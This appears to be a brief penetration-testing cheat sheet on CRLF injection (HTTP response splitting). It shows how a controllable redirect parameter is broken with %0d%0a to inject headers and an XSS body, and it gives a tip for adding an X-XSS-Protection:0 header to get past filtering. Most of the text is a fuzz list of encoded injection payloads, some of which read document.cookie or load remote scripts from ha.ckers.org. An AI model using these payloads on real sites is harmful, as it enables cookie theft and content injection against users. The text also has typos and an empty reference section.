了解CRLF

Simple note:

CRLF: Carriage-Return Line-Feend.

Use CR, ASCII 13 \r (回车) , LF, ASCII 10, \n and %0d%0a to break the HTTP request.

In the penetration test, if we found a request is like this:

1
2
3
GET /test/demo.php?url=https://www.threezh1.com
That we can contral.
....

If the HTTP Header of the request return with the response, which means we can control the HTTP Header.(Of course include the Url.)

1
2
3
4
5
6
7
HTTP/1.1 200 OK
Connection: keep-alive
Content-Encoding: deflate
...
That we can contral.
...
Locations=https://www.threezh1.com

Then we can further test the request, change the parameter url to

%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<script>alert(1)</script>

Equivalent to the following

1
2
3
4
5
6
7
8
9
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length:%2047

<script>alert(1)</script>

or you can chose add a picture: <img src=1>

If the window pops up successfully, there is a CRLF.

Tips:

When the xss is intercepted, you can add X-XSS-Protection:0 to bypass.

And if you meet with a CRLF, there are some filters, you can fuzz the point with the disc of C1h2e1.

FUZZ:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
%0d%0a
%0d%0a%0d%0a
r%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentLength:%2019%0d%0a%0d%0a<html>Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
%0d%0aContentType:%20text/html;charset=UTF-7%0d%0aContent-Length:%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies:%27%2Bdocument.cookie%29%2BADw-/script%2BAD4-%2BADw-/body%2BAD4-%2BADw-/html%2BAD4
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0AContent-Type:html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com
%0d%0a%0d%0a%3Chtml%3E%3Cbody%3E%3C%2Fbody%3E%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fs.js%3E%3C%2Fscript%3E%3Cscript%3Ealert(%22location.host%20is:%20%22%2Blocation.host)%3C%2Fscript%3E%3C%2Fhtml%3E
%0d%0a%0d%0a%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2Fscript%3E
%22%3E%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3C%22
%0AContent-type:%20text/html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
%0d%0a%0d%0a%3Cscript%3Ealert(%22XSS%22)%3C%2Fscript%3E
%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Reference

0%